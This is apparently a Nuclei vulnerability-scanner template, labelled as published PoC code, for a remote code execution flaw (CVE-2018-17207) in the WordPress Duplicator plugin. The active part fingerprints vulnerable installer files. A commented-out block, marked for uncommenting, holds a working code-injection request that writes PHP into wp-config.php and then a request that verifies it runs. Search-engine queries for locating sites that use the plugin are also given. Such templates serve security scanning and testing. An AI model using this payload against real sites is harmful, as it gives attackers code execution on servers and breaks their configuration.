An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
PoC代码[已公开]
id: CVE-2018-17207
info:
name: WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution
author: synacktiv,iamnoooob,pdresearch
severity: critical
description: |
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
reference:
- https://www.synacktiv.com/posts/exploit/wordpress-duplicator-plugin-arbitrary-code-execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-17207
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17207
cwe-id: CWE-94
epss-score: 0.87527
epss-percentile: 0.99428
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
metadata:
vendor: snapcreek
product: duplicator
framework: wordpress
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/duplicator"
google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve,cve2018,wordpress,duplicator,rce
# Uncomment to attempt RCE, but note that it modifies database details, potentially causing the website to not function properly.
# variables:
# marker: "{{randstr}}"
http:
- raw:
- |
POST /installer-backup.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action_step=1
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- "Plugin Version:.*?([0-9].*?)<"
internal: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Duplicator</title>'
- 'dupx-header-version'
- 'Deployment Path:'
condition: and
- type: status
status:
- 200
- type: dsl
dsl:
- compare_versions(version, '< 1.2.42')
# - raw:
# - |-
# POST /installer-backup.php HTTP/1.1
# Host: {{Hostname}}
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
# matchers-condition: and
# matchers:
# - type: word
# part: body
# words:
# - updt_rows
# - scan_rows
# - scan_tables
# condition: and
# - type: status
# status:
# - 200
# internal: true
# - raw:
# - |+
# GET /wp-config.php?input={{base64(marker)}} HTTP/1.1
# Host: {{Hostname}}
# Connection: close
# matchers-condition: and
# matchers:
# - type: word
# part: body
# words:
# - '{{marker}}'
# - type: status
# status:
# - 200
# digest: 4a0a00473045022100c3f903090bfbea2d67a45b6a39cd51a76efe9326daf906810841fe8fadd706d7022010a687d539b5afd33b9230708013346ccace9ec725181343e85b96658e5ef83e:922c64590222798bb761d5b6d8e72950